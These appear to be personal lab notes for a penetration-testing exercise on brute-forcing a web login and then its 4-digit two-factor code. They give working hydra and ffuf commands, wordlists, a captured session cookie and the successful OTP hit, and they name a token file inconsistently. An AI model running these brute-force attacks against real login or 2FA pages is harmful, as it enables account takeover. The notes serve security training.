2FA
One of the most common 2FA implementations uses a user's password and a time-based one-time password (TOTP) provided to the user's smartphone by an authenticator app or via SMS. These TOTPs typically consist only of digits, making them potentially guessable if the length is insufficient and the web application does not implement measures against successive submission of incorrect TOTPs
#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
username: invalid
password: invalid
* error: "Invalid username or password"
- the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc
#brute force credentials
root@oco:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@oco:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
root@oco:~$ hydra -L top-usernames-shortlist.txt -P 500-worst-passwords.txt 94.237.61.84 -s 59351 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid username or password." -T 128
#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
username field: admin
password field: admin
* submit the expected user input
#identity session cookie, the target page, and the error msg
BURP > Proxy
Request
...
GET /2fa.php HTTP/1.1
Host: 94.237.61.84:59351
Referer: http://94.237.61.84:59351/
Cookie: PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8
Connection: close
...
Content-Type: application/x-www-form-urlencoded
* the PHPSESSID cookie is required to associate the TOTP with the authenticated session
BURP > Repeater
Request
...
GET /2fa.php HTTP/1.1
Host: 94.237.61.84:59351
Referer: http://94.237.61.84:59351/
Cookie: PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8
Connection: close
...
Content-Type: application/x-www-form-urlencoded
Response
...
Invalid 2FA Code.
#generate tokens
#some target will provide the necessary information regarding OTP. e.g., Welcome admin. Please provide your 4-digit One-Time Password (OTP).
root@oco:~$ seq -w 0 9999 > tokens.txt
* The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat pwResetTokens.txt
0000
...
9999
root@oco:~$ ffuf -w tokens.txt -u http://94.237.61.84:59351/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8" -d "otp=FUZZ" -fr "Invalid 2FA" -t 120
* ...4723 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 147ms]
- it is normal to get many hits. That is because the session successfully passed
the 2FA check after the correct TOTP was supplied during the ffuf fuzzing. Since
4723 was the first hit, it can be assumed this was the correct TOTP. Afterward,
the session is marked as fully authenticated, so ALL REQUESTS using the session
cookie are redirected to /admin.php.
root@oco:~$ BROWSER > http://94.237.61.84:59351/admin.phpLast updated